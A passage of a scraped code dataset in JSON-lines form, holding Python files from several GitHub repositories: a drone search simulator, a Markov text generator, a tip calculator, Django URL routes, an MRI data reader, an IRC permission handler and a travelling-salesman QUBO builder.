position of drone\n \"\"\"\n home_margin = 6.66 / downsampling\n if placed_pattern == 0:\n in_cage = 0.0\n while in_cage == 0.0:\n self.home = np.array([np.random.randint(min(self.corners[0]), max(self.corners[0])),\n np.random.randint(min(self.corners[0]), max(self.corners[1]))])\n in_cage = self.check_boundaries(is_home=True)\n self.orientation = np.random.randint(360)\n elif placed_pattern == 1: # Distributed over one edge (bottom edge)\n aux = np.random.randint(round(self.corners[0][1] - self.corners[0][0] - 2 * home_margin)) + \\\n self.corners[0][0] + home_margin\n self.home = np.array([aux,\n (self.corners[1][1] - self.corners[1][0]) / (\n self.corners[0][1] - self.corners[0][0]) *\n (aux - self.corners[0][0]) + self.corners[1][0] + home_margin])\n self.orientation = 180\n elif placed_pattern == 2: # Distributed over all edges randomly\n edge = np.random.randint(4)\n if edge == 0: # bottom\n aux = np.random.randint(round(self.corners[0][1] - self.corners[0][0] - 2 * home_margin)) + \\\n self.corners[0][0] + home_margin\n self.home = np.array([aux,\n (self.corners[1][1] - self.corners[1][0]) / (\n self.corners[0][1] - self.corners[0][0]) *\n (aux - self.corners[0][0]) + self.corners[1][0] + home_margin])\n self.orientation = 180\n elif edge == 1: # right\n aux = np.random.randint(round(self.corners[0][1] - self.corners[0][2] - 2 * home_margin)) + \\\n self.corners[0][2] + home_margin\n self.home = np.array([aux,\n (self.corners[1][1] - self.corners[1][2]) / (\n self.corners[0][1] - self.corners[0][2]) *\n (aux - self.corners[0][2] + home_margin) + self.corners[1][2]])\n self.orientation = 270\n elif edge == 2: # top\n aux = np.random.randint(round(self.corners[0][2] - self.corners[0][3] - 2 * home_margin)) + \\\n self.corners[0][3] + home_margin\n self.home = np.array([aux,\n (self.corners[1][2] - self.corners[1][3]) / (\n self.corners[0][2] - self.corners[0][3]) *\n (aux - self.corners[0][3]) + self.corners[1][3] - home_margin])\n self.orientation = 0\n elif edge == 3: # left\n aux = np.random.randint(round(self.corners[0][0] - self.corners[0][3] - 2 * home_margin)) + \\\n self.corners[0][3] + home_margin\n self.home = np.array([aux,\n (self.corners[0][1] - self.corners[1][3]) / (\n self.corners[0][0] - self.corners[0][3]) *\n (aux - self.corners[0][3] - home_margin) + self.corners[1][3]])\n self.orientation = 90\n elif placed_pattern == 3: # Starting from one corner (left bottom)\n # self.home = np.array([self.corners[0][0] + home_margin,\n # self.corners[1][0] + 1.5 * home_margin])\n self.home = np.array([self.corners[0][0] + 3 * home_margin,\n self.corners[1][0] + 3 * home_margin])\n self.orientation = 135\n elif placed_pattern == 4: # Starting from all corners randomly\n corner = np.random.randint(4)\n\n if corner == 0: # Bottom left\n self.home = np.array([self.corners[0][0] + home_margin,\n self.corners[1][0] + 1.5 * home_margin])\n self.orientation = 135\n elif corner == 1: # Bottom right\n self.home = np.array([self.corners[0][1] - 1.5 * home_margin,\n self.corners[1][1] + home_margin])\n self.orientation = 225\n elif corner == 2: # Top right\n self.home = np.array([self.corners[0][2] - home_margin,\n self.corners[1][2] - 1.5 * home_margin])\n self.orientation = 315\n elif corner == 3:\n self.home = np.array([self.corners[0][3] + 1.5 * home_margin,\n self.corners[1][3] - home_margin])\n self.orientation = 45\n\n def get_distance(self):\n self.distance = [\n abs(self.k_array[i] * (self.corners[0][i] - self.position[0]) - (self.corners[1][i] - self.position[1]))\n / np.sqrt(self.k_array[i] ** 2 + 1) for i in range(len(self.k_array))]\n\n def plot_drone_home(self):\n \"\"\"\n plot the drone in the map\n \"\"\"\n plt.plot(self.home[0], self.home[1],\n 'md', markersize=1.5, markeredgewidth=1, fillstyle='none')\n\n def check_boundaries(self, is_home=False):\n \"\"\"\n Checks if a drone is within the range of the cage of KRI\n :param is_home: whether the checking is for initialization\n :return: Flag to indicate whether is in the box\n \"\"\"\n if not is_home:\n pos = [self.position[0], self.position[1]]\n else:\n pos = [self.home[0], self.home[1]]\n\n # Control if is inside the cage. The equation is control=m(x-a)\n control1 = self.m1 * (pos[0] - self.corners[0][0]) + self.corners[1][0] # Y must be above the line\n control2 = self.m2 * (pos[0] - self.corners[0][2]) + self.corners[1][2] # Y must be below the line\n control3 = self.m3 * (pos[0] - self.corners[0][2]) + self.corners[1][2] # Y must be below the line\n control4 = self.m4 * (pos[0] - self.corners[0][0]) + self.corners[1][0] # Y must be above the line\n\n ck1 = np.sign(pos[1] - control1) + 1 # -1 converts to 0, 1 converts to 2\n ck2 = -np.sign(pos[1] - control2) + 1\n ck3 = -np.sign(pos[1] - control3) + 1\n ck4 = np.sign(pos[1] - control4) + 1\n\n return ck1 and ck2 and ck3 and ck4\n\n def plot_status(self):\n \"\"\"\n indicate drone's status with different shape and color\n \"\"\"\n if self.mode.actual == 'Off':\n plt.plot(self.position[0], self.position[1],\n 'ks', markersize=6, fillstyle='none')\n elif self.mode.actual == 'Disarm':\n if self.status_net:\n plt.plot(self.position[0], self.position[1],\n 'gs', markersize=6,\n markeredgewidth=1, fillstyle='none')\n else:\n plt.plot(self.position[0], self.position[1],\n 'rs', markersize=6,\n markeredgewidth=1, fillstyle='none')\n elif self.mode.actual == 'Arm':\n if self.status_net:\n plt.plot(self.position[0], self.position[1],\n 'g+', markersize=6,\n markeredgewidth=1, fillstyle='none')\n else:\n plt.plot(self.position[0], self.position[1],\n 'r+', markersize=6,\n markeredgewidth=1, fillstyle='none')\n else:\n if self.status_net:\n plt.plot(self.position[0], self.position[1],\n 'gx', markersize=6,\n markeredgewidth=1, fillstyle='none')\n else:\n plt.plot(self.position[0], self.position[1],\n 'rx', markersize=6,\n markeredgewidth=1, fillstyle='none')\n\n def plot_velocity(self):\n \"\"\"\n plot drone's velocity\n \"\"\"\n plt.quiver(self.position[0], self.position[1],\n self.speed * np.cos(np.deg2rad(self.direction - 90)),\n self.speed * np.sin(np.deg2rad(self.direction - 90)),\n color='b', units='dots', scale=1, width=3, headaxislength=3)\n\n def plot_vision(self, dense=1):\n \"\"\"\n plot the angular vision of a drone\n \"\"\"\n for i in range(0, len(self.vision), dense):\n if sum(self.vision[i]) != 0:\n tmp = np.nonzero(self.vision[i])\n line_range = [tmp[0][-1], tmp[0][0]]\n plt.plot(line_range, [i, i], 'y', LineWidth=4, alpha=0.5)\n\n def detect_person(self, people):\n \"\"\"\n :param people: person class with people position\n :return:\n detected: number of objects have been detected\n pos_detected: the position of object has been detected\n \"\"\"\n detected = 0\n pos_detected = []\n for person in people:\n y_idx, x_idx = np.nonzero(self.vision)\n if (round(person.position[0]) in x_idx) and (round(person.position[1]) in y_idx) \\\n and (person.detected is False):\n detected += 1\n pos_detected.append(tuple(person.position))\n # person.detected = True\n return detected, pos_detected\n\n def goto(self, general_mission_parameters):\n near = 0\n if self.mode.actual is \"Raster_motion\":\n self.mode.parameters_destination = self.mission_strat_position\n self.direction = np.rad2deg(np.arctan2(self.mode.parameters_destination[1] - self.position[1],\n self.mode.parameters_destination[0] - self.position[0])) + 90\n self.orientation = self.direction\n if np.linalg.norm(self.position - self.mode.parameters_destination) < self.speed:\n self.speed = np.linalg.norm(self.position - self.mode.parameters_destination)\n if np.linalg.norm(\n self.position - self.mode.parameters_destination) < general_mission_parameters.distance_thres:\n near = 1\n return near\n\n def action(self, mission_parameters):\n if self.mode.actual == 'Ignore': # Ignore the detection and continue with the previous status\n # self = self\n pass\n elif self.mode.actual == 'RTL':\n # Update the attributes of the drone based on the destination position.\n # Indicate if the drone is near the destination\n near = self.goto(mission_parameters)\n # drone_out[drone_idx] = drone_in[drone_idx]\n # if the drone is near to the home position, land\n if near:\n self.speed = 0\n self.mode.actual = 'Arm'\n if self.environment.info_flag:\n print(\"Drone {} landed and armed\".format(self.index))\n elif self.mode.actual == 'GoToPerson': # Send the drones to the position of the person detected\n # Update the attributes of the drone based on the destination position.\n # Indicate if the drone is near the destination\n near = self.goto(mission_parameters) # If the drone is near to the destination position, loiter\n if near:\n self.speed = 0\n self.mode.actual = 'Loiter'\n if self.environment.info_flag:\n print(\"Drone {} is loitering\".format(self.index))\n self.mode.parameters_destination = self.position\n elif self.mode.actual is 'Loiter': # Keep the drone flying at its current position\n near = self.goto(mission_parameters)\n self.speed = 0\n # Define the basic random actions: front, back, right, left, rotation +90, -90, 180\n elif self.mode.actual is 'Random_action':\n # if mission_parameters.isDebug:\n # drone_action_id = np.random.randint(mission_parameters.num_simple_actions)\n # else:\n # drone_action_id = mission_parameters.action_id[self.index]\n if np.min(self.distance) < 6.66 / self.downsampling:\n idx = np.argmin(self.distance)\n drone_action_id = idx + (-1) ** idx\n else:\n if mission_parameters.action_id is None:\n drone_action_id = np.random.randint(mission_parameters.num_simple_actions)\n else:\n drone_action_id = mission_parameters.action_id[self.index]\n self.simple_action(drone_action_id, mission_parameters)\n elif self.mode.actual is 'FreeFly':\n drone_action_id = mission_parameters.action_id[self.index]\n self.simple_action(drone_action_id, mission_parameters)\n elif self.mode.actual is 'Raster_motion':\n if not self.is_mission_start:\n near = self.goto(mission_parameters)\n if near:\n self.speed = mission_parameters.speed\n self.direction = 105\n self.orientation = self.direction\n print(\"Drone #{} arriving mission starting point. Raster motion start.\".format(self.index))\n self.is_mission_start = True\n else:\n threshold = 6.66 / self.downsampling * 0.5 * self.radius_vision * np.sin(\n np.deg2rad(self.angular_vision) / 2) / mission_parameters.speed\n if self.is_init:\n self.current_raster_step = self.total_raster_step\n self.direction = 105\n self.orientation = self.direction\n self.speed = mission_parameters.speed\n if self.distance[1] > threshold and self.distance[3] > threshold:\n self.is_init = False\n\n else:\n if self.distance[1] < threshold or self.distance[3] < threshold:\n if self.current_raster_step != 0:\n self.is_right = False\n self.is_left = False\n self.current_raster_step -= 1\n self.direction = 195\n self.orientation = self.direction\n self.speed = mission_parameters.speed\n else:\n if self.distance[1] < threshold:\n self.is_right = True\n self.direction = 285\n self.orientation = self.direction\n self.speed = mission_parameters.speed\n elif self.distance[3] < threshold:\n self.is_left = True\n self.direction = 105\n self.orientation = self.direction\n self.speed = mission_parameters.speed\n self.current_raster_step = self.total_raster_step\n\n else:\n if self.is_right:\n self.direction = 285\n self.orientation = self.direction\n self.speed = mission_parameters.speed\n elif self.is_left:\n self.direction = 105\n self.orientation = self.direction\n self.speed = mission_parameters.speed\n self.current_raster_step = self.total_raster_step\n else:\n pass\n\n def simple_action(self, action_id, mission_parameters):\n # action_id = 0 --> Move 1 meter/s to the north\n # action_id = 1 --> Move 1 meter/s to the south\n # action_id = 2 --> Move 1 meter/s to the east\n # action_id = 3 --> Move 1 meter/s to the west\n # action_id = 4 --> Rotate 30 degrees clockwise\n # action_id = 5 --> Rotate 30 degrees counter clockwise\n # action_id = 6 --> Rotate 180 degrees clockwise\n if action_id == 0:\n self.direction = 0\n self.speed = mission_parameters.speed\n elif action_id == 1:\n self.direction = 180\n self.speed = mission_parameters.speed\n elif action_id == 2:\n self.direction = 90\n self.speed = mission_parameters.speed\n elif action_id == 3:\n self.direction = 270\n self.speed = mission_parameters.speed\n elif action_id == 4:\n self.orientation = self.orientation + 30\n self.speed = 0\n elif action_id == 5:\n self.orientation = self.orientation - 30\n self.speed = 0\n elif action_id == 6:\n self.orientation = self.orientation + 180\n self.speed = 0\n","repo_name":"wuyushuwys/Kostas_Simulator","sub_path":"Drone.py","file_name":"Drone.py","file_ext":"py","file_size_in_byte":21803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13472857812","text":"import pickle\nimport random\nimport argparse\nfrom sys import stdin\n\n\ndef rand_choose(dic, word, result, args):\n a = []\n for neighboring in dic[word]:\n a.append(neighboring)\n current = random.choice(a)\n if args.file == 'stdout':\n print(current + ' ', end='')\n else:\n result.write(current + ' ')\n return current\n\n\nparser = argparse.ArgumentParser(description='A script which collects words from file')\nparser.add_argument('--model', type=str, help='Load dictionary from a file')\nparser.add_argument('--seed', dest='first', type=str, help='First word')\nparser.add_argument('--length', type=int, help='The length of the generated text')\nparser.add_argument('--output', dest='file', type=str, default='stdout', help='Finished text download file')\nargs = parser.parse_args()\nf = args.model # откуда будем выгружать словарь\nwith open('d.pickle', 'rb') as f:\n my_dic = pickle.load(f)\nfirst = args.first\nlength = args.length\nway = args.file\nresult = open(way, 'w')\ncurrent = first\nfor i in range(length):\n if current in my_dic:\n current = rand_choose(my_dic, current, result, args)\n else:\n a = []\n for key in my_dic:\n a.append(key)\n current = random.choice(a)\n if args.file == 'stdout':\n print(current + ' ', end='')\n else:\n result.write(current + ' ')","repo_name":"MertMuseibov/yandex_present","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3642462726","text":"#**************************************************************\n# Date: 040221 *\n# Tax and Tip *\n# Programmer: BoredManager *\n# The program that you create for this exercise will begin by * \n# reading the cost of a meal ordered at a restaurant from the * \n# user. Then your program will compute the tax and tip for * \n# the meal. Use your local tax rate when computing the amount * \n# of tax owing. Compute the tip as 18 percent of the meal * \n# amount (without the tax). The output from your program * \n# should include the tax amount, the tip amount, and the * \n# grand total for the meal including both the tax and the * \n# tip. Format the output so that all of the values are * \n# displayed using two decimal places. *\n#**************************************************************\ncomputed_value = 0\nicheck = -1\nwhile icheck == -1:\n iMealCost = input(\"Please enter the total meal amount in Php ==> \")\n try:\n ciMealCost = float(iMealCost)\n icheck = 0\n except:\n print(\"Please use number data only.\")\n#--------------------------------------------------------------\nPhpTax = .10\nTipPercent = .18\ncomputed_tax = round((ciMealCost * PhpTax),2)\ncomputed_tip = round((ciMealCost * TipPercent),2)\ntotal_computed_value = ciMealCost + computed_tax + computed_tip\ntotal_computed_value = round(total_computed_value,2)\nciMealCost = round(ciMealCost,2)\n#--------------------------------------------------------------\nfinal_cost = str(ciMealCost)\nfinal_tip = str(computed_tip)\nfinal_tax = str(computed_tax)\nfinal_value = str(total_computed_value)\n#--------------------------------------------------------------\nprint(\"The meal amount is Php \"+final_cost)\nprint(\"The tax amount is Php \"+final_tax)\nprint(\"The tip amount is Php \"+final_tip)\nprint(\"The total amount due is Php \"+final_value)\nprint(\"Thank you for using this app.\")\n\n#**************************************************************\n# what have I learned from this challenge?\n# - it gets easier because the next challenge is usually a \n# variation of the previous one.\n# - i still need to brush up with the variable definition and \n# available operation in Python (A1).","repo_name":"boredmanager888/mycommonrepo","sub_path":"pythonwb_intro/E006.py","file_name":"E006.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71812402988","text":"#!/usr/bin/python3\n\ndef search_replace(my_list, search, replace):\n # Create a new list to store the modified elements\n new_list = []\n for item in my_list:\n # Check if the item matches the search element\n if item == search:\n # If it matches, append the replace element to the new list\n new_list.append(replace)\n else:\n # If it doesn't match, append the original item to the new list\n new_list.append(item)\n return new_list\n","repo_name":"ImadPro69/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/1-search_replace.py","file_name":"1-search_replace.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73062533547","text":"from django.conf.urls import patterns, url\nfrom django.views.generic import TemplateView\n\nurlpatterns = patterns('',\n url(r'^$', 'ams.views.default', name='default'),\n url(r'^event/(?P\\d{1,3})/$', 'ams.views.detail', name='detail'),\n url(r'^engineer/(?P\\d{1,3})/$', 'ams.views.detail_engineer', name='engineer'),\n url(r'^step/(?P\\d{1,3})/$', 'ams.views.detail_step', name='step'),\n\n url(r'^accounts/login/$', 'ams.views.user_login', name='login'),\n url(r'^accounts/login/welcome/$', TemplateView.as_view(template_name='ams/welcome.html'), name='welcome'),\n\n url(r'^accounts/logout/$', 'ams.views.user_logout', name='logout'),\n url(r'^accounts/logout/goodbye/$', TemplateView.as_view(template_name='ams/goodbye.html'), name='goodbye'),\n)\n","repo_name":"cmltaWt0/django-ams","sub_path":"ams/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39136490773","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n#\n# Complete the 'formingMagicSquare' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY s as parameter.\n#\n\ndef formingMagicSquare(s):\n possiblePermutations = [\n [[8, 1, 6], [3, 5, 7], [4, 9, 2]],\n [[6, 1, 8], [7, 5, 3], [2, 9, 4]],\n [[4, 9, 2], [3, 5, 7], [8, 1, 6]],\n [[2, 9, 4], [7, 5, 3], [6, 1, 8]],\n [[8, 3, 4], [1, 5, 9], [6, 7, 2]],\n [[4, 3, 8], [9, 5, 1], [2, 7, 6]],\n [[6, 7, 2], [1, 5, 9], [8, 3, 4]],\n [[2, 7, 6], [9, 5, 1], [4, 3, 8]]]\n\n minCost = 1000\n for i in range(8):\n permutationCost = 0\n for j in range(3):\n for k in range(3):\n permutationCost += abs(s[j][k] - possiblePermutations[i][j][k])\n minCost = min(minCost, permutationCost)\n return minCost\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = []\n\n for _ in range(3):\n s.append(list(map(int, input().rstrip().split())))\n\n result = formingMagicSquare(s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"burcia1711/hackerrank","sub_path":"problem solving/algorithms/catsAndMouse.py","file_name":"catsAndMouse.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5174436555","text":"'''readSyncdata'''\n\nimport os\nfrom ctypes import c_uint32\n\nimport numpy as np\n\nfrom mr_utils.load_data.s2i import sScanHeader, sMDH\n\ndef readSyncdata(siemens_dat, VBFILE, acquisitions, dma_length,\n scanheader, header, last_scan_counter):\n\n if VBFILE:\n len = dma_length - sMDH.itemsize\n\n # Is VB magic? For now let's assume it's not, and that this\n # is just Siemens secret sauce.\n siemens_dat.seek(len, os.SEEK_CUR)\n # return std::vector();\n return None\n else:\n raise NotImplementedError()\n\n len = dma_length - sScanHeader.itemsize\n\n # siemens_dat.seekg(len,siemens_dat.cur)\n # return std::vector()\n cur_pos = siemens_dat.tell()\n packetSize = np.fromfile(\n siemens_dat, dtype=c_uint32, count=1)\n\n packedID = siemens_dat.read(52)\n\n # packedID indicates this isn't PMU data, so let's jump ship\n if 'PMU' not in packedID:\n siemens_dat.seek(cur_pos)\n siemens_dat.seek(len, os.SEEK_CUR)\n # return std::vector();\n return None\n\n learning_phase = 'PMULearnPhase' in packedID\n\n (swappedFlag, timestamp0, timestamp, packerNr,\n duration) = np.fromfile(siemens_dat, dtype=c_uint32, count=5)\n\n # magic = PMU_Type_inverse[np.fromfile(\n # siemens_dat, dtype=c_uint32, count=1)[0]]\n\n# # Read in all the PMU data first, to figure out if we have\n# # multiple ECGs.\n# std::map, uint32_t >> pmu_map;\n# std::set ecg_types = {PMU_Type::ECG1, PMU_Type::ECG2, PMU_Type::ECG3, PMU_Type::ECG4};\n# std::map, uint32_t >> ecg_map;\n# while (magic != PMU_Type::END) {\n# //Read and store period\n# uint32_t period;\n#\n# siemens_dat.read((char *) &period, sizeof(uint32_t));\n#\n# //Allocate and read data\n# std::vector data(duration / period);\n# siemens_dat.read((char *) data.data(), data.size() * sizeof(PMUdata));\n# //Split into ECG and PMU sets.\n# if (ecg_types.count(magic)) {\n# ecg_map[magic] = std::make_tuple(std::move(data), period);\n# } else {\n# pmu_map[magic] = std::make_tuple(std::move(data), period);\n# }\n# //Read next tag\n# siemens_dat.read((char *) &magic, sizeof(uint32_t));\n# if (!PMU_Types.count(magic))\n# throw std::runtime_error(\"Malformed file\");\n#\n#\n# }\n#\n# //Have to handle ECG seperately.\n#\n# std::vector waveforms;\n# waveforms.reserve(5);\n# if (ecg_map.size() > 0 || pmu_map.size() > 0) {\n#\n# if (ecg_map.size() > 0) {\n#\n# size_t channels = ecg_map.size();\n# size_t number_of_elements = std::get<0>(ecg_map.begin()->second).size();\n#\n# auto ecg_waveform = ISMRMRD::Waveform(number_of_elements, channels + 1);\n# ecg_waveform.head.waveform_id = waveformId.at(PMU_Type::ECG1) + 5 * learning_phase;\n#\n# uint32_t *ecg_waveform_data = ecg_waveform.data;\n#\n# uint32_t *trigger_data = ecg_waveform_data + number_of_elements * channels;\n# std::fill(trigger_data, trigger_data + number_of_elements, 0);\n# //Copy in the data\n# for (auto key_val : ecg_map) {\n# auto tup = unpack_pmu(std::get<0>(key_val.second));\n# auto &data = std::get<0>(tup);\n# auto &trigger = std::get<1>(tup);\n#\n# std::copy(data.begin(), data.end(), ecg_waveform_data);\n# ecg_waveform_data += data.size();\n#\n# for (auto i = 0; i < number_of_elements; i++) trigger_data[i] |= trigger[i];\n#\n# }\n#\n# // ecg_waveform.head.sample_time_us = sample_time_us.at(PMU_Type::ECG1);\n# waveforms.push_back(std::move(ecg_waveform));\n#\n#\n# }\n#\n#\n# for (auto key_val : pmu_map) {\n# auto tup = unpack_pmu(std::get<0>(key_val.second));\n# auto &data = std::get<0>(tup);\n# auto &trigger = std::get<1>(tup);\n#\n# auto waveform = ISMRMRD::Waveform(data.size(), 2);\n# waveform.head.waveform_id = waveformId.at(key_val.first) + 5 * learning_phase;\n# std::copy(data.begin(), data.end(), waveform.data);\n#\n# std::copy(trigger.begin(), trigger.end(), waveform.data + data.size());\n#\n# # waveform.head.sample_time_us = sample_time_us.at(key_val.first)\n# waveforms.push_back(std::move(waveform))\n# }\n# # Figure out number of ECG channels\n#\n#\n# for waveform in waveforms:\n# waveform['head']['time_stamp'] = timestamp\n# waveform['head']['measurement_uid'] = scanheader['lMeasUID']\n# waveform['head']['scan_counter'] = last_scan_counter\n# waveform['head']['sample_time_us'] = duration*100/waveform['head']['number_of_samples']\n#\n# if waveforms:\n# makeWaveformHeader(header) # Add the header if needed\n#\n# siemens_dat.seek(cur_pos)\n# siemens_dat.seek(len, os.CUR)\n# return waveforms\n","repo_name":"mckib2/mr_utils","sub_path":"mr_utils/load_data/s2i/read_sync_data.py","file_name":"read_sync_data.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"18328700487","text":"import ast\nimport os\n\nimport pandas as pd\nfrom collections import Counter\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nN = 10 # the number of most popular labels to keep\n\ndata = pd.read_csv(\"arxiv_data.csv\")\ndata[\"terms\"] = data[\"terms\"].apply(ast.literal_eval)\n\ntransformer = MultiLabelBinarizer(sparse_output=True)\ntransformer.fit(data[\"terms\"])\nK = len(transformer.classes_)\nprint(\"The original dataset has {} unique labels\".format(K))\n\ncounter = Counter()\nfor labels in data[\"terms\"]:\n counter.update(labels)\nmin_count = counter.most_common(N)[-1]\n\n\ndef filter_labels(labels):\n labels = [label for label in labels if counter[label] >= 294]\n return labels\n\n\ndata[\"terms\"] = data[\"terms\"].apply(filter_labels)\ndata[\"titles\"] = data[\"titles\"].apply(lambda x: x.replace(\"\\n\", \" \"))\ndata[\"summaries\"] = data[\"summaries\"].apply(lambda x: x.replace(\"\\n\", \" \"))\n\n# Create the folder if not already exists, save dataset\nif not os.path.exists(\"data\"):\n os.mkdir(\"data\")\ndata.to_csv(\"./data/arxiv_abstract.csv\", index=False)\n","repo_name":"Azure/azureml-examples","sub_path":"sdk/python/jobs/automl-standalone-jobs/automl-nlp-text-classification-multilabel-task-paper-categorization/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":1362,"dataset":"github-code","pt":"37"} +{"seq_id":"20698030973","text":"import abstract as ab\nimport os\nimport pathlib as pl\n\n#pdf 텍스트 파일 생성\nclass play:\n def start():\n path = os.getcwd()+'\\\\file\\\\'\n pdf_fileList = [str(i) for i in pl.Path(path).glob(\"*.pdf\")]\n text_fileList = [str(i) for i in pl.Path(path).glob(\"*.txt\")]\n for i in pdf_fileList:\n if i in text_fileList:\n continue\n else:\n read_text = ab.pdfcontroll.pdf_conv_text(i)\n ab.filecontroll.text_create(i,read_text)\n\n\n #텍스트 파일 다시 읽어오기\n text_fileList = [str(i) for i in pl.Path(path).glob(\"*.txt\")]\n textlist = []\n for i in text_fileList:\n textlist.append([i.split('\\\\')[-1].split('.')[0],ab.filecontroll.read_text(i)])\n \n return textlist\n\n","repo_name":"vkdlxld7777/project4","sub_path":"project4.py","file_name":"project4.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25809283321","text":"#! /usr/bin/python\n\nimport os\nimport json\n\n\nclass AuthHandler():\n '''Stores hostmask and permission group info for usernames, writes the data\n to a json config file'''\n\n def __init__(self, filename):\n self.filename = filename\n self.config = {}\n self._load_config()\n\n def add_user(self, username, hostmask, group):\n username = username.lower()\n group = group.lower()\n\n self.config[username] = {'groups' : [group],\n 'hostmasks': [hostmask]\n }\n self._save_config()\n \n def add_user_group(self, username, group):\n self.config[username]['groups'].append(group)\n self._save_config()\n \n def add_user_hostmask(self, username, hostmask):\n username = username.lower()\n self.config[username]['hostmasks'].append(hostmask)\n self._save_config()\n\n def get_group_list(self):\n groupList = []\n for user in self.config:\n groupList.extend([i for i in self.config[user]['groups'] if i not in groups])\n return groupList\n\n def get_user_permissions(self, username, hostmask):\n username = username.lower()\n knownHostmasks = self.config.get(username, {}).get('hostmasks', [])\n if hostmask in knownHostmasks:\n return self.config.get(username).get('groups')\n else:\n return None\n\n def remove_group(self, user, groupName):\n if user in self.config:\n if groupName in self.config[user]['groups']:\n self.config[user]['groups'].remove(groupName)\n self._save_config()\n \n def remove_user(self, username):\n username = username.lower()\n try:\n self.config.pop(username)\n self._save_config()\n except KeyError:\n return False\n\n def remove_user_hostmask(self, username, hostmask):\n username = username.lower()\n try:\n self.config[username]['hostmasks'].remove(hostmask)\n self._save_config()\n except KeyError:\n return False\n \n def _load_config(self):\n try:\n if os.path.isfile(self.filename):\n self.config = json.load(open(self.filename))\n\n except ValueError:\n self.config = {}\n\n def _save_config(self):\n f = open(self.filename, 'w')\n f.write(json.dumps(self.config, indent = 4))\n f.close()\n\n\n \n\n\n\n\n","repo_name":"forty-two/WikIRC","sub_path":"permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6066916191","text":"import itertools\nimport numpy as np\nimport random\nfrom math import radians, sin, cos, sqrt, atan2\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\nfrom matplotlib.animation import FuncAnimation\nfrom functools import partial\nfrom sympy import *\nimport os\nimport scipy.io as sio\n# import dimod\n# import neal\n\n# Function to calculate distance between two cities using Haversine formula\ndef calculateDistance(city1, city2):\n # Earth radius in meters\n R = 6371000\n\n # Convert latitude and longitude to radians\n lat1, lon1 = map(radians, city1)\n lat2, lon2 = map(radians, city2)\n\n # Haversine formula\n dlat = lat2 - lat1\n dlon = lon2 - lon1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n distance = R * c\n\n return distance\n\ndef get_distance_matrix(cityCoordinates):\n N = int(len(cityCoordinates)) #numNodes\n\n # Calculate distance matrix\n distanceMatrix = [[0] * N for _ in range(N)]\n for i in range(N):\n for j in range(N):\n distanceMatrix[i][j] = calculateDistance(cityCoordinates[i], cityCoordinates[j])\n print(\"Distance matrix calculated\")\n\n return distanceMatrix\n\ndef get_obective_fct(cityNames, distanceMatrix, N, X):\n # Define objective function\n obj = 0\n\n print(N)\n # Iterate over each element of the symbolic matrix\n for i in range(N):\n for j in range(N):\n for p in range(N-1):\n obj = obj + distanceMatrix[i][j]*X[i,p]*X[j,p+1]\n\n obj = obj + distanceMatrix[i][j]*X[i,0]*X[j,N-1]\n\n return obj\n\ndef get_Q(X, N, distanceMatrix, obj, enforce_start_city, start_city, elements):\n # Add all symbolic elements of each row together\n row_sums = [sum(X.row(i)) for i in range(N)]\n col_sums = [sum(X.col(i)) for i in range(N)]\n\n # Construct a new symbolic matrix from the row sums\n C1 = (Matrix(row_sums) - Matrix(np.ones(N))).T.multiply((Matrix(row_sums) - Matrix(np.ones(N))))\n C2 = (Matrix(col_sums) - Matrix(np.ones(N))).T.multiply((Matrix(col_sums) - Matrix(np.ones(N))))\n\n # Scale to maximum coeff + 1\n Penalty = np.max(distanceMatrix) + 1\n\n # Construct the objective function\n obj_comb = Matrix([obj]) + Penalty*(C1.row(0) + C2.row(0) + enforce_start_city*Matrix([pow(X[start_city,0]-1,2)]))\n\n # Compute the quadratic terms using the Hessian matrix\n hess = hessian(obj_comb, elements)/2\n\n # Compute the linear terms based on binary variable constraint\n gradient = lambda f, v: Matrix([f]).jacobian(v)\n grad = gradient(obj_comb, elements)\n b = np.array([row.as_coefficients_dict()[1] for row in grad])\n diag_m_b = np.diag(b)\n Q = hess + diag_m_b\n Q = np.array(Q.tolist(), dtype=float)\n\n return Q\n\ndef matrix_to_dict(matrix):\n dictionary = {}\n rows, columns = matrix.shape\n\n for i in range(rows):\n for j in range(columns):\n key = (i, j)\n value = matrix[i, j]\n dictionary[key] = value\n\n return dictionary\n\ndef dict_to_mat(dictionary):\n # Extract the keys and values from the dictionary\n keys = list(dictionary.keys())\n values = list(dictionary.values())\n\n # Determine the matrix dimensions based on the keys\n num_rows = max([key[0] for key in keys]) + 1\n num_cols = max([key[1] for key in keys]) + 1\n\n # Create the NumPy matrix\n matrix = np.zeros((num_rows, 